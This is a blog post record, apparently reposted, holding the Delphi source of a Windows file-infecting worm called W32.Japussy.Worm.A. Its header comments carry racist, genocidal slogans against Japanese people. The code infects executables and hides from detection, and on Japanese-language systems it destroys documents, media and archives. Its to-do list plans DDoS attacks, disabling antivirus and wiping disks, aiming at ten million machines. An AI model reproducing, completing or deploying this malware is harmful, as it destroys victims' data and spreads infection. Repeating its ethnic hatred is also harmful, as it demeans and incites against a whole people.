{"id":129,"date":"2008-11-01T16:08:00","date_gmt":"2008-11-01T08:08:00","guid":{"rendered":""},"modified":"2013-11-24T21:29:53","modified_gmt":"2013-11-24T13:29:53","slug":"%e7%86%8a%e7%8c%ab%e7%83%a7%e9%a6%99%e5%8e%9f%e5%a7%8b%e4%bb%a3%e7%a0%81","status":"publish","type":"post","link":"https:\/\/kyle.ai\/blog\/129.html","title":{"rendered":"\u718a\u732b\u70e7\u9999\u539f\u59cb\u4ee3\u7801"},"content":{"rendered":"
\r\n{ Taking our names from the great empire, instinct-driven face of the }\r\n{ human psyche, Chinese are, by general acknowledgement, the smartest }\r\n{ race in the world. Today, the sons of Qin Empire will give the just }\r\n{ punishment to those lousy japs, the mose flagitious race of the }\r\n{ world, the biggest enemy of all Chinese. }\r\n{ }\r\n{ All wrathful brethren, Unite! }\r\n{ }\r\n{ This program is free software; you can redistribute it and\/or modify }\r\n{ it under the terms of the GNU General Public License as published by }\r\n{ the Free Software Foundation; either version 2, or (at your option) }\r\n{ any later version. }\r\n{ }\r\n{ Crossbow\u75c5\u6bd2\u5f00\u653e\u6e90\u4ee3\u7801\u8ba1\u5212 }\r\n{ }\r\n{ \u7248\u6743\u6240\u6709 (C) 1999-2003 Crossbow [\u4e2d\u56fd] }\r\n{ }\r\n{ \u5c31\u50cf\u6211\u4eec\u7684\u540d\u5b57\u6765\u81ea\u4e8e\u90a3\u4e2a\u4f1f\u5927\u7684\u5e1d\u56fd\u4e00\u6837\uff0c\u4eba\u7c7b\u7075\u9b42\u7684\u672c\u80fd\u6240\u80fd\u516c\u8ba4\u7684\uff0c }\r\n{ \u4e2d\u534e\u6c11\u65cf\uff0c\u662f\u5168\u4e16\u754c\u4f17\u6240\u5468\u77e5\u6700\u806a\u660e\u7684\u6c11\u65cf\u3002\u4eca\u5929\uff0c\u5927\u79e6\u5e1d\u56fd\u7684\u5b50\u5b59\u4eec\u5c06\u7ed9\u4e88 }\r\n{ \u4e2d\u534e\u6c11\u65cf\u7684\u4e16\u4ee3\u4ec7\u654c\uff0c\u90a3\u4e9b\u5351\u52a3\u7325\u7410\u7684\u502d\u72d7\uff0c\u4e16\u754c\u4e0a\u6700\u65e0\u803b\u3001\u6700\u5351\u9119\u3001\u6700\u6b8b\u5fcd }\r\n{ \u7684\u6c11\u65cf\u4ee5\u6b63\u4e49\u7684\u60e9\u7f5a\u3002 }\r\n{ }\r\n{ \u6124\u6012\u7684\u708e\u9ec4\u5b50\u5b59\u4eec\uff0c\u56e2\u7ed3\u8d77\u6765\uff01 }\r\n{ }\r\n{ \u8fd9\u4efd\u7a0b\u5e8f\u662f\u81ea\u7531\u8f6f\u4ef6\uff0c\u4f60\u53ef\u4ee5\u5728\u57fa\u4e8e\u7531\u81ea\u7531\u8f6f\u4ef6\u57fa\u91d1\u4f1a(Free Software }\r\n{ Foundation) \u6240\u53d1\u5e03\u4e4bGNU\u901a\u7528\u516c\u4f17\u534f\u8bae(GNU General Public License)\u7684\u539f }\r\n{ \u5219\u4e0a\u518d\u5206\u53d1\u548c\/\u6216\u4fee\u6539\u5b83\uff0c\u6216\u5176\u540e\u7eed\u7248\u672c\u3002 }\r\n{ }\r\n{**********************************************************************}\r\n\r\n{**********************************************************************}\r\n{ Name: W32.Japussy.Worm.A 0.01 Alpha }\r\n{ Date: 2003\/10\/21 }\r\n{ Compiler: Delphi 5 or later }\r\n{ Contributors: Sorted by Alphabet }\r\n{ BaiLaoHu [bailaohu@yeah.net] }\r\n{ Crossbow [crossbow@borlandsoft.com] }\r\n{ JunFengRen [junfeng.ren@mail.tinco.com] }\r\n{ ThenLong [thenlong@msn.com] }\r\n{ TieXinLiu [tiexinliu@8860.net] }\r\n{ Total 5 persons }\r\n{ }\r\n{ \u540d\u5b57: W32.Japussy.Worm.A 0.01 Alpha }\r\n{ \u65e5\u671f: 2003\/10\/21 }\r\n{ \u7f16\u8bd1\u5668: Delphi 5\u6216\u66f4\u65b0 }\r\n{ \u53c2\u4e0e\u8005: \u4ee5\u5b57\u6bcd\u987a\u5e8f\u6392\u5217 }\r\n{ BaiLaoHu [bailaohu@yeah.net] }\r\n{ Crossbow [crossbow@borlandsoft.com] }\r\n{ JunFengRen [junfeng.ren@mail.tinco.com] }\r\n{ ThenLong [thenlong@msn.com] }\r\n{ TieXinLiu [tiexinliu@8860.net] }\r\n{ \u76ee\u524d\u603b\u51715\u4eba }\r\n{**********************************************************************}\r\n\r\n{**********************************************************************}\r\n{ \u5f85\u89e3\u51b3\u7684\u95ee\u9898: }\r\n{ }\r\n{ 1. WinNT\u4e0b\u8fdc\u7a0b\u7ebf\u7a0b\u6620\u5c04\u5230Explorer\u8fdb\u7a0b }\r\n{ 1. WinNT\u4e0b\u83b7\u5f97\u7ba1\u7406\u5458\u6743\u9650 }\r\n{ 2. \u81ea\u5df1\u5f00SMTP\u670d\u52a1\u5668\u53d1\u5e26\u6bd2\u90ae\u4ef6\u6216\u8005\u7528ESMTP\u53d1\u5e26\u6bd2\u90ae\u4ef6 }\r\n{ 3. Base64\u7f16\u7801\uff0c\u5728\u4fdd\u6301\u4e0d\u5927\u5e45\u589e\u52a0\u75c5\u6bd2\u4f53\u5927\u5c0f\u7684\u524d\u63d0\u4e0b }\r\n{ 4. \u56fa\u5b9a\u65e5\u671fDDoS(\u96c6\u7fa4\u5f0f\u62d2\u7edd\u670d\u52a1)\u653b\u51fb\u6307\u5b9a\u502d\u72d7\u7f51\u7ad9\u652f\u4ed8\u7f51\u5173 }\r\n{ 5. \u80fd\u6740\u6389\u5e38\u89c1\u9632\u706b\u5899\u548c\u6740\u6bd2\u8f6f\u4ef6\u8fdb\u7a0b }\r\n{ 6. \u7edd\u5bf9\u78c1\u76d8\u6247\u533a\u5199\u64cd\u4f5c\uff0c\u6467\u6bc1\u5206\u533a\u8868\u548c\u6587\u4ef6\u5206\u914d\u8868 }\r\n{**********************************************************************}\r\n\r\n{**********************************************************************}\r\n{ \u8fd9\u4efd\u8ba1\u5212\u501f\u9274\u4e86SOJ\u8001\u5927\u7684\u4ee3\u7801\uff0c\u5e76\u505a\u4e86\u5927\u91cf\u7684\u4fee\u6539\u548c\u5b8c\u5584\u3002Upx\u538b\u7f29\u8fc7\u7684\u75c5\u6bd2 }\r\n{ \u4f53\u53ea\u670938K\uff0c\u548c\u5176\u5b83Win32ASM\u5199\u76846K\u5de6\u53f3\u7684\u75c5\u6bd2\u6765\u8bf4\u53ef\u4ee5\u662f\u5e9e\u7136\u5927\u7269\u4e86\u3002\u7531\u4e8e }\r\n{ \u6ca1\u6709\u4fee\u6539\u5165\u53e3\u70b9\uff0c\u76ee\u524dNorton AntiVirus 2001\u65e0\u6cd5\u67e5\u51fa\u5b83\u3002 }\r\n{ }\r\n{ \u6211\u8ba4\u4e3a\u4e0e\u5176\u5728\u8bba\u575b\u4e0a\u5bf9\u502d\u72d7\u7834\u53e3\u5927\u9a82\uff0c\u8fd8\u4e0d\u5982\u505a\u70b9\u5b9e\u4e8b\u3002\u4e00\u6765\u53ef\u4ee5\u5b66\u4e60\u77e5\u8bc6\uff0c }\r\n{ \u63d0\u9ad8\u6c34\u5e73\uff0c\u8ba4\u8bc6\u4e00\u4e9b\u53ef\u4ee5\u4e92\u76f8\u5b66\u4e60\u7684\u670b\u53cb\u3002\u4e8c\u6765\u5b8c\u5de5\u540e\u53ef\u4ee5\u8ba9\u502d\u72d7\u5403\u70b9\u82e6\u5934\uff0c }\r\n{ \u8fd8\u662f\u5f88\u60ec\u610f\u7684\u3002\u6211\u7684\u76ee\u6807\u662f\u611f\u67d31000\u4e07\u53f0\u4ee5\u4e0a\u7684\u673a\u5668\u3002 }\r\n{ }\r\n{ \u76ee\u524d\u8fd9\u4e2a\u75c5\u6bd2\u8fd8\u8fdc\u8fdc\u6ca1\u6709\u8fbe\u5230\u9884\u5b9a\u7684\u8bbe\u60f3\uff0c\u6240\u4ee5\u5e0c\u671b\u5927\u5bb6\u4e00\u8d77\u6765\u5b8c\u5584\u5b83\u3002\u5982\u679c }\r\n{ \u53ef\u80fd\uff0c\u4ee5\u540e\u4f1a\u7528Win32Asm\u91cd\u5199\u5b83\u3002 }\r\n{ }\r\n{ \u8fd9\u662f\u4e00\u4e2a\u516c\u76ca\u8ba1\u5212\uff0c\u672c\u7740\u5b8c\u5168\u81ea\u613f\u5f00\u53d1\u7684\u539f\u5219\u3002\u5e0c\u671b\u5927\u5bb6\u5728\u4e0d\u5f71\u54cd\u5de5\u4f5c\u7684\u60c5\u51b5 }\r\n{ \u4e0b\u5229\u7528\u7a7a\u4f59\u65f6\u95f4\u52a0\u5165\u672c\u8ba1\u5212\u3002\u52a0\u5165\u8fd9\u4e2a\u8ba1\u5212\u7684\u670b\u53cb\u53ef\u4ee5\u83b7\u8d60\u6211\u6536\u85cf\u7684200\u4f59\u7bc7 }\r\n{ \u75c5\u6bd2\u7684\u4ee3\u7801\u548c\u8d44\u6599\uff0c\u6211\u5c06\u4e0d\u5b9a\u671f\u5728CSDN\u4e0a\u516c\u5e03\u8ba1\u5212\u7684\u8fdb\u5ea6\u3002 }\r\n{ }\r\n{**********************************************************************}\r\n\r\n{**********************************************************************}\r\n{ \u4e25\u91cd\u8b66\u544a: }\r\n{ }\r\n{ \uff01\uff01\uff01\u8bf7\u4e0d\u8981\u5728\u672a\u8bfb\u61c2\u6e90\u4ee3\u7801\u7684\u60c5\u51b5\u4e0b\u7f16\u8bd1\u8fd0\u884c\u672c\u7a0b\u5e8f\uff0c\u5426\u5219\u540e\u679c\u81ea\u8d1f\uff01\uff01\uff01 }\r\n{ }\r\n{ \u6211\u4eec\u4ea4\u6d41\u7684\u662f\u6280\u672f\uff0c\u5c55\u793a\u7684\u6e90\u4ee3\u7801\u548c\u76f8\u5173\u4ee3\u7801\u7684\u76ee\u7684\u53ea\u662f\u4e3a\u4e86\u8bf4\u660e\u6280\u672f\u7684\u539f\u7406 }\r\n{ \u548c\u4f7f\u7528\u3002\u5982\u679c\u4efb\u4f55\u4e2a\u4eba\u6216\u7ec4\u7ec7\u5229\u7528\u672c\u6587\u6863\u53d1\u5e03\u7684\u6280\u672f\u8fdb\u884c\u7834\u574f\uff0c\u5e94\u7531\u5176\u672c\u4eba\u8d1f }\r\n{ \u8d23\uff0c\u4e0e\u672c\u8ba1\u5212\u7684\u53c2\u4e0e\u8005\u65e0\u5173\uff01\uff01\uff01 }\r\n{ }\r\n{**********************************************************************}\r\n\r\nprogram Japussy;\r\n\r\nuses\r\nWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};\r\n\r\nconst\r\nHeaderSize = 82432; \/\/\u75c5\u6bd2\u4f53\u7684\u5927\u5c0f\r\nIconOffset = $12EB8; \/\/PE\u6587\u4ef6\u4e3b\u56fe\u6807\u7684\u504f\u79fb\u91cf\r\n\r\n\/\/\u5728\u6211\u7684Delphi5 SP1\u4e0a\u9762\u7f16\u8bd1\u5f97\u5230\u7684\u5927\u5c0f\uff0c\u5176\u5b83\u7248\u672c\u7684Delphi\u53ef\u80fd\u4e0d\u540c\r\n\/\/\u67e5\u627e2800000020\u7684\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\u53ef\u4ee5\u627e\u5230\u4e3b\u56fe\u6807\u7684\u504f\u79fb\u91cf\r\n\r\n{\r\nHeaderSize = 38912; \/\/Upx\u538b\u7f29\u8fc7\u75c5\u6bd2\u4f53\u7684\u5927\u5c0f\r\nIconOffset = $92BC; \/\/Upx\u538b\u7f29\u8fc7PE\u6587\u4ef6\u4e3b\u56fe\u6807\u7684\u504f\u79fb\u91cf\r\n\r\n\/\/Upx 1.24W \u7528\u6cd5: upx -9 --8086 Japussy.exe\r\n}\r\n\r\nIconSize = $2E8; \/\/PE\u6587\u4ef6\u4e3b\u56fe\u6807\u7684\u5927\u5c0f--744\u5b57\u8282\r\nIconTail = IconOffset + IconSize; \/\/PE\u6587\u4ef6\u4e3b\u56fe\u6807\u7684\u5c3e\u90e8\r\nID = $44444444; \/\/\u611f\u67d3\u6807\u8bb0\r\n\r\n\/\/\u5783\u573e\u7801\uff0c\u4ee5\u5907\u5199\u5165\r\nCatchword = 'If a race need to be killed out, it must be Yamato. ' +\r\n'If a country need to be destroyed, it must be Japan! ' +\r\n'*** W32.Japussy.Worm.A ***';\r\n\r\n{$R *.RES}\r\n\r\nfunction RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;\r\nstdcall; external 'Kernel32.dll'; \/\/\u51fd\u6570\u58f0\u660e\r\n\r\nvar\r\nTmpFile: string;\r\nSi: STARTUPINFO;\r\nPi: PROCESS_INFORMATION;\r\nIsJap: Boolean = False; \/\/\u65e5\u6587\u64cd\u4f5c\u7cfb\u7edf\u6807\u8bb0\r\n\r\n{ \u5224\u65ad\u662f\u5426\u4e3aWin9x }\r\n\r\nfunction IsWin9x: Boolean;\r\nvar\r\nVer: TOSVersionInfo;\r\nbegin\r\nResult := False;\r\nVer.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);\r\nif not GetVersionEx(Ver) then\r\nExit;\r\nif (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then \/\/Win9x\r\nResult := True;\r\nend;\r\n\r\n{ \u5728\u6d41\u4e4b\u95f4\u590d\u5236 }\r\n\r\nprocedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;\r\ndStartPos: Integer; Count: Integer);\r\nvar\r\nsCurPos, dCurPos: Integer;\r\nbegin\r\nsCurPos := Src.Position;\r\ndCurPos := Dst.Position;\r\nSrc.Seek(sStartPos, 0);\r\nDst.Seek(dStartPos, 0);\r\nDst.CopyFrom(Src, Count);\r\nSrc.Seek(sCurPos, 0);\r\nDst.Seek(dCurPos, 0);\r\nend;\r\n\r\n{ \u5c06\u5bbf\u4e3b\u6587\u4ef6\u4ece\u5df2\u611f\u67d3\u7684PE\u6587\u4ef6\u4e2d\u5206\u79bb\u51fa\u6765\uff0c\u4ee5\u5907\u4f7f\u7528 }\r\n\r\nprocedure ExtractFile(FileName: string);\r\nvar\r\nsStream, dStream: TFileStream;\r\nbegin\r\ntry\r\nsStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);\r\ntry\r\ndStream := TFileStream.Create(FileName, fmCreate);\r\ntry\r\nsStream.Seek(HeaderSize, 0); \/\/\u8df3\u8fc7\u5934\u90e8\u7684\u75c5\u6bd2\u90e8\u5206\r\ndStream.CopyFrom(sStream, sStream.Size - HeaderSize);\r\nfinally\r\ndStream.Free;\r\nend;\r\nfinally\r\nsStream.Free;\r\nend;\r\nexcept\r\nend;\r\nend;\r\n\r\n{ \u586b\u5145STARTUPINFO\u7ed3\u6784 }\r\n\r\nprocedure FillStartupInfo(var Si: STARTUPINFO; State: Word);\r\nbegin\r\nSi.cb := SizeOf(Si);\r\nSi.lpReserved := nil;\r\nSi.lpDesktop := nil;\r\nSi.lpTitle := nil;\r\nSi.dwFlags := STARTF_USESHOWWINDOW;\r\nSi.wShowWindow := State;\r\nSi.cbReserved2 := 0;\r\nSi.lpReserved2 := nil;\r\nend;\r\n\r\n{ \u53d1\u5e26\u6bd2\u90ae\u4ef6 }\r\n\r\nprocedure SendMail;\r\nbegin\r\n\/\/\u54ea\u4f4d\u4ec1\u5144\u613f\u610f\u5b8c\u6210\u4e4b\uff1f\r\nend;\r\n\r\n{ \u611f\u67d3PE\u6587\u4ef6 }\r\n\r\nprocedure InfectOneFile(FileName: string);\r\nvar\r\nHdrStream, SrcStream: TFileStream;\r\nIcoStream, DstStream: TMemoryStream;\r\niID: LongInt;\r\naIcon: TIcon;\r\nInfected, IsPE: Boolean;\r\ni: Integer;\r\nBuf: array[0..1] of Char;\r\nbegin\r\ntry \/\/\u51fa\u9519\u5219\u6587\u4ef6\u6b63\u5728\u88ab\u4f7f\u7528\uff0c\u9000\u51fa\r\nif CompareText(FileName, 'JAPUSSY.EXE') = 0 then \/\/\u662f\u81ea\u5df1\u5219\u4e0d\u611f\u67d3\r\nExit;\r\nInfected := False;\r\nIsPE := False;\r\nSrcStream := TFileStream.Create(FileName, fmOpenRead);\r\ntry\r\nfor i := 0 to $108 do \/\/\u68c0\u67e5PE\u6587\u4ef6\u5934\r\nbegin\r\nSrcStream.Seek(i, soFromBeginning);\r\nSrcStream.Read(Buf, 2);\r\nif (Buf[0] = #80) and (Buf[1] = #69) then \/\/PE\u6807\u8bb0\r\nbegin\r\nIsPE := True; \/\/\u662fPE\u6587\u4ef6\r\nBreak;\r\nend;\r\nend;\r\nSrcStream.Seek(-4, soFromEnd); \/\/\u68c0\u67e5\u611f\u67d3\u6807\u8bb0\r\nSrcStream.Read(iID, 4);\r\nif (iID = ID) or (SrcStream.Size < 10240) then \/\/\u592a\u5c0f\u7684\u6587\u4ef6\u4e0d\u611f\u67d3\r\nInfected := True;\r\nfinally\r\nSrcStream.Free;\r\nend;\r\nif Infected or (not IsPE) then \/\/\u5982\u679c\u611f\u67d3\u8fc7\u4e86\u6216\u4e0d\u662fPE\u6587\u4ef6\u5219\u9000\u51fa\r\nExit;\r\nIcoStream := TMemoryStream.Create;\r\nDstStream := TMemoryStream.Create;\r\ntry\r\naIcon := TIcon.Create;\r\ntry\r\n\/\/\u5f97\u5230\u88ab\u611f\u67d3\u6587\u4ef6\u7684\u4e3b\u56fe\u6807(744\u5b57\u8282)\uff0c\u5b58\u5165\u6d41\r\naIcon.ReleaseHandle;\r\naIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);\r\naIcon.SaveToStream(IcoStream);\r\nfinally\r\naIcon.Free;\r\nend;\r\nSrcStream := TFileStream.Create(FileName, fmOpenRead);\r\n\/\/\u5934\u6587\u4ef6\r\nHdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);\r\ntry\r\n\/\/\u5199\u5165\u75c5\u6bd2\u4f53\u4e3b\u56fe\u6807\u4e4b\u524d\u7684\u6570\u636e\r\nCopyStream(HdrStream, 0, DstStream, 0, IconOffset);\r\n\/\/\u5199\u5165\u76ee\u524d\u7a0b\u5e8f\u7684\u4e3b\u56fe\u6807\r\nCopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);\r\n\/\/\u5199\u5165\u75c5\u6bd2\u4f53\u4e3b\u56fe\u6807\u5230\u75c5\u6bd2\u4f53\u5c3e\u90e8\u4e4b\u95f4\u7684\u6570\u636e\r\nCopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);\r\n\/\/\u5199\u5165\u5bbf\u4e3b\u7a0b\u5e8f\r\nCopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);\r\n\/\/\u5199\u5165\u5df2\u611f\u67d3\u7684\u6807\u8bb0\r\nDstStream.Seek(0, 2);\r\niID := $44444444;\r\nDstStream.Write(iID, 4);\r\nfinally\r\nHdrStream.Free;\r\nend;\r\nfinally\r\nSrcStream.Free;\r\nIcoStream.Free;\r\nDstStream.SaveToFile(FileName); \/\/\u66ff\u6362\u5bbf\u4e3b\u6587\u4ef6\r\nDstStream.Free;\r\nend;\r\nexcept;\r\nend;\r\nend;\r\n\r\n{ \u5c06\u76ee\u6807\u6587\u4ef6\u5199\u5165\u5783\u573e\u7801\u540e\u5220\u9664 }\r\n\r\nprocedure SmashFile(FileName: string);\r\nvar\r\nFileHandle: Integer;\r\ni, Size, Mass, Max, Len: Integer;\r\nbegin\r\ntry\r\nSetFileAttributes(PChar(FileName), 0); \/\/\u53bb\u6389\u53ea\u8bfb\u5c5e\u6027\r\nFileHandle := FileOpen(FileName, fmOpenWrite); \/\/\u6253\u5f00\u6587\u4ef6\r\ntry\r\nSize := GetFileSize(FileHandle, nil); \/\/\u6587\u4ef6\u5927\u5c0f\r\ni := 0;\r\nRandomize;\r\nMax := Random(15); \/\/\u5199\u5165\u5783\u573e\u7801\u7684\u968f\u673a\u6b21\u6570\r\nif Max < 5 then\r\nMax := 5;\r\nMass := Size div Max; \/\/\u6bcf\u4e2a\u95f4\u9694\u5757\u7684\u5927\u5c0f\r\nLen := Length(Catchword);\r\nwhile i < Max do\r\nbegin\r\nFileSeek(FileHandle, i * Mass, 0); \/\/\u5b9a\u4f4d\r\n\/\/\u5199\u5165\u5783\u573e\u7801\uff0c\u5c06\u6587\u4ef6\u5f7b\u5e95\u7834\u574f\u6389\r\nFileWrite(FileHandle, Catchword, Len);\r\nInc(i);\r\nend;\r\nfinally\r\nFileClose(FileHandle); \/\/\u5173\u95ed\u6587\u4ef6\r\nend;\r\nDeleteFile(PChar(FileName)); \/\/\u5220\u9664\u4e4b\r\nexcept\r\nend;\r\nend;\r\n\r\n{ \u83b7\u5f97\u53ef\u5199\u7684\u9a71\u52a8\u5668\u5217\u8868 }\r\n\r\nfunction GetDrives: string;\r\nvar\r\nDiskType: Word;\r\nD: Char;\r\nStr: string;\r\ni: Integer;\r\nbegin\r\nfor i := 0 to 25 do \/\/\u904d\u538626\u4e2a\u5b57\u6bcd\r\nbegin\r\nD := Chr(i + 65);\r\nStr := D + ':\\';\r\nDiskType := GetDriveType(PChar(Str));\r\n\/\/\u5f97\u5230\u672c\u5730\u78c1\u76d8\u548c\u7f51\u7edc\u76d8\r\nif (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then\r\nResult := Result + D;\r\nend;\r\nend;\r\n\r\n{ \u904d\u5386\u76ee\u5f55\uff0c\u611f\u67d3\u548c\u6467\u6bc1\u6587\u4ef6 }\r\n\r\nprocedure LoopFiles(Path, Mask: string);\r\nvar\r\ni, Count: Integer;\r\nFn, Ext: string;\r\nSubDir: TStrings;\r\nSearchRec: TSearchRec;\r\nMsg: TMsg;\r\nfunction IsValidDir(SearchRec: TSearchRec): Integer;\r\nbegin\r\nif (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and\r\n(SearchRec.Name <> '..') then\r\nResult := 0 \/\/\u4e0d\u662f\u76ee\u5f55\r\nelse if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and\r\n(SearchRec.Name <> '..') then\r\nResult := 1 \/\/\u4e0d\u662f\u6839\u76ee\u5f55\r\nelse Result := 2; \/\/\u662f\u6839\u76ee\u5f55\r\nend;\r\nbegin\r\nif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then\r\nbegin\r\nrepeat\r\nPeekMessage(Msg, 0, 0, 0, PM_REMOVE); \/\/\u8c03\u6574\u6d88\u606f\u961f\u5217\uff0c\u907f\u514d\u5f15\u8d77\u6000\u7591\r\nif IsValidDir(SearchRec) = 0 then\r\nbegin\r\nFn := Path + SearchRec.Name;\r\nExt := UpperCase(ExtractFileExt(Fn));\r\nif (Ext = '.EXE') or (Ext = '.SCR') then\r\nbegin\r\nInfectOneFile(Fn); \/\/\u611f\u67d3\u53ef\u6267\u884c\u6587\u4ef6\r\nend\r\nelse if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then\r\nbegin\r\n\/\/\u611f\u67d3HTML\u548cASP\u6587\u4ef6\uff0c\u5c06Base64\u7f16\u7801\u540e\u7684\u75c5\u6bd2\u5199\u5165\r\n\/\/\u611f\u67d3\u6d4f\u89c8\u6b64\u7f51\u9875\u7684\u6240\u6709\u7528\u6237\r\n\/\/\u54ea\u4f4d\u5927\u5144\u5f1f\u613f\u610f\u5b8c\u6210\u4e4b\uff1f\r\nend\r\nelse if Ext = '.WAB' then \/\/Outlook\u5730\u5740\u7c3f\u6587\u4ef6\r\nbegin\r\n\/\/\u83b7\u53d6Outlook\u90ae\u4ef6\u5730\u5740\r\nend\r\nelse if Ext = '.ADC' then \/\/Foxmail\u5730\u5740\u81ea\u52a8\u5b8c\u6210\u6587\u4ef6\r\nbegin\r\n\/\/\u83b7\u53d6Foxmail\u90ae\u4ef6\u5730\u5740\r\nend\r\nelse if Ext = 'IND' then \/\/Foxmail\u5730\u5740\u7c3f\u6587\u4ef6\r\nbegin\r\n\/\/\u83b7\u53d6Foxmail\u90ae\u4ef6\u5730\u5740\r\nend\r\nelse\r\nbegin\r\nif IsJap then \/\/\u662f\u502d\u6587\u64cd\u4f5c\u7cfb\u7edf\r\nbegin\r\nif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or\r\n(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or\r\n(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or\r\n(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or\r\n(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or\r\n(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then\r\nSmashFile(Fn); \/\/\u6467\u6bc1\u6587\u4ef6\r\nend;\r\nend;\r\nend;\r\n\/\/\u611f\u67d3\u6216\u5220\u9664\u4e00\u4e2a\u6587\u4ef6\u540e\u7761\u7720200\u6beb\u79d2\uff0c\u907f\u514dCPU\u5360\u7528\u7387\u8fc7\u9ad8\u5f15\u8d77\u6000\u7591\r\nSleep(200);\r\nuntil (FindNext(SearchRec) <> 0);\r\nend;\r\nFindClose(SearchRec);\r\nSubDir := TStringList.Create;\r\nif (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then\r\nbegin\r\nrepeat\r\nif IsValidDir(SearchRec) = 1 then\r\nSubDir.Add(SearchRec.Name);\r\nuntil (FindNext(SearchRec) <> 0);\r\nend;\r\nFindClose(SearchRec);\r\nCount := SubDir.Count - 1;\r\nfor i := 0 to Count do\r\nLoopFiles(Path + SubDir.Strings[i] + '\\', Mask);\r\nFreeAndNil(SubDir);\r\nend;\r\n\r\n{ \u904d\u5386\u78c1\u76d8\u4e0a\u6240\u6709\u7684\u6587\u4ef6 }\r\n\r\nprocedure InfectFiles;\r\nvar\r\nDriverList: string;\r\ni, Len: Integer;\r\nbegin\r\nif GetACP = 932 then \/\/\u65e5\u6587\u64cd\u4f5c\u7cfb\u7edf\r\nIsJap := True; \/\/\u53bb\u6b7b\u5427\uff01\r\nDriverList := GetDrives; \/\/\u5f97\u5230\u53ef\u5199\u7684\u78c1\u76d8\u5217\u8868\r\nLen := Length(DriverList);\r\nwhile True do \/\/\u6b7b\u5faa\u73af\r\nbegin\r\nfor i := Len downto 1 do \/\/\u904d\u5386\u6bcf\u4e2a\u78c1\u76d8\u9a71\u52a8\u5668\r\nLoopFiles(DriverList[i] + ':\\', '*.*'); \/\/\u611f\u67d3\u4e4b\r\nSendMail; \/\/\u53d1\u5e26\u6bd2\u90ae\u4ef6\r\nSleep(1000 * 60 * 5); \/\/\u7761\u77205\u5206\u949f\r\nend;\r\nend;\r\n\r\n{ \u4e3b\u7a0b\u5e8f\u5f00\u59cb }\r\n\r\nbegin\r\nif IsWin9x then \/\/\u662fWin9x\r\nRegisterServiceProcess(GetCurrentProcessID, 1) \/\/\u6ce8\u518c\u4e3a\u670d\u52a1\u8fdb\u7a0b\r\nelse \/\/WinNT\r\nbegin\r\n\/\/\u8fdc\u7a0b\u7ebf\u7a0b\u6620\u5c04\u5230Explorer\u8fdb\u7a0b\r\n\/\/\u54ea\u4f4d\u5144\u53f0\u613f\u610f\u5b8c\u6210\u4e4b\uff1f\r\nend;\r\n\/\/\u5982\u679c\u662f\u539f\u59cb\u75c5\u6bd2\u4f53\u81ea\u5df1\r\nif CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then\r\nInfectFiles \/\/\u611f\u67d3\u548c\u53d1\u90ae\u4ef6\r\nelse \/\/\u5df2\u5bc4\u751f\u4e8e\u5bbf\u4e3b\u7a0b\u5e8f\u4e0a\u4e86\uff0c\u5f00\u59cb\u5de5\u4f5c\r\nbegin\r\nTmpFile := ParamStr(0); \/\/\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\r\nDelete(TmpFile, Length(TmpFile) - 4, 4);\r\nTmpFile := TmpFile + #32 + '.exe'; \/\/\u771f\u6b63\u7684\u5bbf\u4e3b\u6587\u4ef6\uff0c\u591a\u4e00\u4e2a\u7a7a\u683c\r\nExtractFile(TmpFile); \/\/\u5206\u79bb\u4e4b\r\nFillStartupInfo(Si, SW_SHOWDEFAULT);\r\nCreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,\r\n0, nil, '.', Si, Pi); \/\/\u521b\u5efa\u65b0\u8fdb\u7a0b\u8fd0\u884c\u4e4b\r\nInfectFiles; \/\/\u611f\u67d3\u548c\u53d1\u90ae\u4ef6\r\nend;\r\nend.\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
{ Taking our names from the great empire, instinct-driv […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-129","post","type-post","status-publish","format-standard","hentry","category-code_related"],"_links":{"self":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/comments?post=129"}],"version-history":[{"count":1,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/129\/revisions"}],"predecessor-version":[{"id":5212,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/129\/revisions\/5212"}],"wp:attachment":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/media?parent=129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp